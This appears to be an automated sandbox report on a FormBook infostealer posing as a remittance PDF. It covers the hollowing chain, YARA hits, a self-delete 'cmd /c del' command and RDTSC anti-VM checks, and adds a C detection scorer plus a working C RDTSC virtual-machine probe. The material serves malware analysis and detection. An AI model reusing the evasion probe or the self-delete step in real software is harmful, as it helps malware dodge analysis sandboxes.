Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9760 NtOpenProcess
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036BA770 NtOpenThread
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036BA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9560 NtWriteFile
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036BAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02717B90 NtCreateFile
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02717C40 NtReadFile
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02717CC0 NtClose
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02717D70 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02717C3A NtReadFile
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02717CC4 NtClose
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02717D6A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0494841F
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049FD466
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04962581
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0494D5E0
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A025DD
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A02D07
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04930D20
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A01D55
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A02EF7
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049FD616
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04956E30
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A01FF1
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A0DFCE
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0494B090
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A020A8
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049620A0
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A028EC
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A0E824
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049F1002
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0493F900
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04954120
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A022AE
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049EFA2B
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0496EBB0
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049F03DA
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049FDBD2
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04A02B28
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10411026
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10411030
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_1042B127
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10418A30
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_1042B52A
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10412D90
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_1042C59F
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_1042BF81
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10412FB0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03742B28
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0373DBD2
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036AEBB0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_037422AE
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03694120
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0367F900
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03731002
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_037428EC
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036A20A0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_037420A8
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0368B090
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03741FF1
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03696E30
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0373D616
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03742EF7
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03741D55
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03670D20
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_03742D07
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0368D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_037425DD
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036A2581
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0373D466
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0368841F
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02708A30
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0271B127
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02702FB0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0271BF81
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0271B52A
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_02702D90
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_0271C59F
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 0367B150 appears 35 times
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: String function: 0493B150 appears 45 times
Source: Remittance Advice pdf.exe | Binary or memory string: OriginalFilename vs Remittance Advice pdf.exe
Source: Remittance Advice pdf.exe, 00000000.00000003.329625690.0000000002124000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs Remittance Advice pdf.exe
Source: Remittance Advice pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/1@8/4
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Remittance Advice pdf.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | File read: C:\Users\user\Desktop\Remittance Advice pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\Remittance Advice pdf.exe 'C:\Users\user\Desktop\Remittance Advice pdf.exe'
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\DpiScaling.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
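Read as a chain, the process creations above are the FormBook pattern: the Delphi-built dropper (note the HKCU\Software\Borland\Delphi\Locales lookups) starts a 32-bit Windows utility as a hollowing host (it requests System32\DpiScaling.exe and WOW64 redirection lands it in SysWOW64), code injected into explorer.exe then starts further SysWOW64 utilities (autofmt.exe, WWAHost.exe) with bare command lines, and the last host removes the first with cmd.exe /c del. The following C program is an added example, not part of the sandbox report or of the sample; it encodes that chain as records transcribed from the tree above, adds a constructed benign chain for comparison, and scores both with three rules whose names and flag values are this example's own. It runs offline with no dependencies.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    const char *parent;  /* image path of the creating process */
    const char *child;   /* image path of the created process */
    const char *cmdline; /* command line the child was started with */
} ProcEvent;

/* Records transcribed from the process tree in the report above. */
static const ProcEvent SAMPLE[] = {
    {"unknown", "C:\\Users\\user\\Desktop\\Remittance Advice pdf.exe",
     "'C:\\Users\\user\\Desktop\\Remittance Advice pdf.exe'"},
    /* 32-bit dropper asks for System32\DpiScaling.exe; WOW64 redirects it to SysWOW64 */
    {"C:\\Users\\user\\Desktop\\Remittance Advice pdf.exe", "C:\\Windows\\SysWOW64\\DpiScaling.exe",
     "C:\\Windows\\System32\\DpiScaling.exe"},
    {"C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\autofmt.exe", "C:\\Windows\\SysWOW64\\autofmt.exe"},
    {"C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\WWAHost.exe", "C:\\Windows\\SysWOW64\\WWAHost.exe"},
    {"C:\\Windows\\SysWOW64\\WWAHost.exe", "C:\\Windows\\SysWOW64\\cmd.exe",
     "/c del 'C:\\Windows\\SysWOW64\\DpiScaling.exe'"},
    {"C:\\Windows\\SysWOW64\\cmd.exe", "C:\\Windows\\System32\\conhost.exe",
     "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"},
};
#define SAMPLE_LEN (sizeof SAMPLE / sizeof SAMPLE[0])

/* Constructed benign chain for comparison (not from the report). */
static const ProcEvent BENIGN[] = {
    {"C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe",
     "\"C:\\Windows\\System32\\notepad.exe\" C:\\Users\\user\\notes.txt"},
    {"C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\conhost.exe",
     "\\??\\C:\\Windows\\system32\\conhost.exe 0x4"},
};
#define BENIGN_LEN (sizeof BENIGN / sizeof BENIGN[0])

/* Rule flags; names and values are this example's own, not the sandbox's. */
enum {
    R_USERDIR_SPAWNS_SYSWOW = 1,  /* a binary under C:\Users starts a SysWOW64 system binary */
    R_EXPLORER_SPAWNS_SYSWOW = 2, /* explorer.exe starts a SysWOW64 binary with a bare command line */
    R_SELF_DELETE_OF_HOST = 4     /* cmd.exe /c del names an earlier SysWOW64 child of the chain */
};

/* Case-insensitive helpers: Windows paths compare case-insensitively. */
static int iprefix(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}
static int ieq(const char *a, const char *b) { return strlen(a) == strlen(b) && iprefix(a, b); }
static int icontains(const char *hay, const char *needle)
{
    for (; *hay; hay++)
        if (iprefix(hay, needle))
            return 1;
    return 0;
}
static const char *basename_w(const char *p)
{
    const char *s = strrchr(p, '\\');
    return s ? s + 1 : p;
}
int in_syswow64(const char *p) { return iprefix(p, "C:\\Windows\\SysWOW64\\"); }
int in_user_dir(const char *p) { return iprefix(p, "C:\\Users\\"); }

/* Returns the OR of all rule flags that fire. Events must be in creation
 * order so that a del target can be matched against an earlier child. */
int score_chain(const ProcEvent *ev, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (in_user_dir(ev[i].parent) && in_syswow64(ev[i].child))
            hits |= R_USERDIR_SPAWNS_SYSWOW;
        if (ieq(basename_w(ev[i].parent), "explorer.exe") && in_syswow64(ev[i].child)
            && ieq(ev[i].cmdline, ev[i].child))
            hits |= R_EXPLORER_SPAWNS_SYSWOW;
        if (ieq(basename_w(ev[i].child), "cmd.exe") && icontains(ev[i].cmdline, "/c del"))
            for (size_t j = 0; j < i; j++)
                if (in_syswow64(ev[j].child) && icontains(ev[i].cmdline, ev[j].child))
                    hits |= R_SELF_DELETE_OF_HOST;
    }
    return hits;
}

int main(void)
{
    printf("report chain: rule flags 0x%x\n", score_chain(SAMPLE, SAMPLE_LEN)); /* 0x7 */
    printf("benign chain: rule flags 0x%x\n", score_chain(BENIGN, BENIGN_LEN)); /* 0x0 */
    return 0;
}
```

The third rule is the one with the best signal-to-noise: a system binary deleting another system binary's on-disk copy from SysWOW64 has no legitimate counterpart, while the first two rules also fire on some installers and on 32-bit shell extensions, so they are better used to raise priority than to alert on their own. Feeding real EDR process-creation telemetry into this needs only the same three fields (parent image, child image, command line).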
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: Binary string: WWAHost.pdb source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500837817.0000000004A2F000.00000040.00000001.sdmp, WWAHost.exe, 00000014.00000002.599807554.000000000376F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe, WWAHost.exe
          Source: Binary string: DpiScaling.pdb source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: DpiScaling.pdbGCTL source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E9C388 push ecx; mov dword ptr [esp], edx | 0_3_03E9C38A
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E8D320 push 0040E090h; ret | 0_3_03E8D494
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E941C0 push 00414DE0h; ret | 0_3_03E941E4
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E94108 push 00414D49h; ret | 0_3_03E9414D
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E990D4 push ecx; mov dword ptr [esp], edx | 0_3_03E990D6
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E8D050 push 0040E090h; ret | 0_3_03E8D494
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EAF7E8 push 00430408h; ret | 0_3_03EAF80C
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E93790 push 0041442Ch; ret | 0_3_03E93830
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EA8728 push 00429348h; ret | 0_3_03EA874C
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EB0700 push 00431320h; ret | 0_3_03EB0724
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E93718 push 00414382h; ret | 0_3_03E93786
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E93716 push 00414382h; ret | 0_3_03E93786
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E866E0 push ecx; mov dword ptr [esp], eax | 0_3_03E866E1
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E826C0 push eax; ret | 0_3_03E826FC
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EA86C0 push 004292F2h; ret | 0_3_03EA86F6
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EA76D8 push 004282F8h; ret | 0_3_03EA76FC
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EA96D4 push 0042A300h; ret | 0_3_03EA9704
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EA7698 push 004282B8h; ret | 0_3_03EA76BC
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EB066C push 00431298h; ret | 0_3_03EB069C
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E88674 push ecx; mov dword ptr [esp], eax | 0_3_03E88675
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EB05D0 push 0043121Dh; ret | 0_3_03EB0621
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EAA528 push 0042B16Bh; ret | 0_3_03EAA56F
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E8D4A0 push 0040E103h; ret | 0_3_03E8D507
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E88484 push ecx; mov dword ptr [esp], eax | 0_3_03E88485
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E8D49E push 0040E103h; ret | 0_3_03E8D507
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E85BF8 push 00406818h; ret | 0_3_03E85C1C
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EA9BA4 push 0042A7C4h; ret | 0_3_03EA9BC8
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03EA6B3C push 0042775Ch; ret | 0_3_03EA6B60
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E85B08 push 00406728h; ret | 0_3_03E85B2C
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E95B18 push ecx; mov dword ptr [esp], edx | 0_3_03E95B1D
Source: C:\Users\user\Desktop\Remittance Advice pdf.exe | Code function: 0_3_03E9DA4C push 0041E6D0h; ret | 0_3_03E9DAD4
Source: C:\Windows\SysWOW64\WWAHost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\DpiScaling.exe | RDTSC instruction interceptor: First address: 00000000104183C4, second address: 00000000104183CA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\DpiScaling.exe | RDTSC instruction interceptor: First address: 000000001041875E, second address: 0000000010418764, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe | RDTSC instruction interceptor: First address: 00000000027083C4, second address: 00000000027083CA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe | RDTSC instruction interceptor: First address: 000000000270875E, second address: 0000000002708764, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04976DE6 rdtsc
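The sequence the interceptor caught (rdtsc, then xor ecx, ecx / add ecx, eax to stash the low 32 bits of the first reading, then rdtsc again) is the standard hypervisor and tracer timing probe: on bare metal two adjacent RDTSC reads differ by a few dozen cycles, whereas a hypervisor that traps RDTSC, or an instrumentation layer that single-steps it, widens that gap by orders of magnitude. The C program below is an added example, not code from the sample or from the report; it reproduces the measurement with inline assembly, takes the minimum over many probes so that an interrupt landing between two reads does not produce a false positive, and keeps the decision in a separate function. The 500-cycle threshold is an assumption, as is the clock_gettime fallback, which exists only so the file builds on non-x86 hosts.

```c
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
/* Same instruction the sample executes; EDX:EAX receives the 64-bit counter. */
static inline uint64_t read_tsc(void)
{
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}
#else
/* Assumption: on non-x86 hosts fall back to a nanosecond clock so the file
 * still builds; the deltas are then nanoseconds rather than cycles. */
static inline uint64_t read_tsc(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One probe, mirroring the flagged sequence (rdtsc / xor ecx,ecx / add ecx,eax
 * / rdtsc): two back-to-back reads with only a register move between them.
 * The sample keeps only EAX, i.e. the low 32 bits; the full 64-bit value is
 * used here so the subtraction cannot wrap at a 32-bit boundary. */
uint64_t rdtsc_pair_delta(void)
{
    uint64_t t0 = read_tsc();
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Minimum over many probes. Interrupts and context switches inflate single
 * samples, but the minimum reflects the cheapest path, which still runs to
 * thousands of cycles when a hypervisor traps RDTSC. */
uint64_t min_rdtsc_delta(unsigned samples)
{
    uint64_t best = UINT64_MAX;
    for (unsigned i = 0; i < samples; i++) {
        uint64_t d = rdtsc_pair_delta();
        if (d < best)
            best = d;
    }
    return best;
}

/* Policy kept apart from measurement so it can be tested deterministically. */
int delta_indicates_vm(uint64_t min_delta, uint64_t threshold)
{
    return min_delta > threshold;
}

int main(void)
{
    /* Assumption: 500 cycles is a commonly used cut-off, not a value from the report. */
    const uint64_t threshold = 500;
    uint64_t d = min_rdtsc_delta(1000);
    printf("min rdtsc delta over 1000 probes: %llu -> %s\n", (unsigned long long)d,
           delta_indicates_vm(d, threshold) ? "RDTSC appears trapped (VM or tracer)"
                                             : "native timing");
    return 0;
}
```

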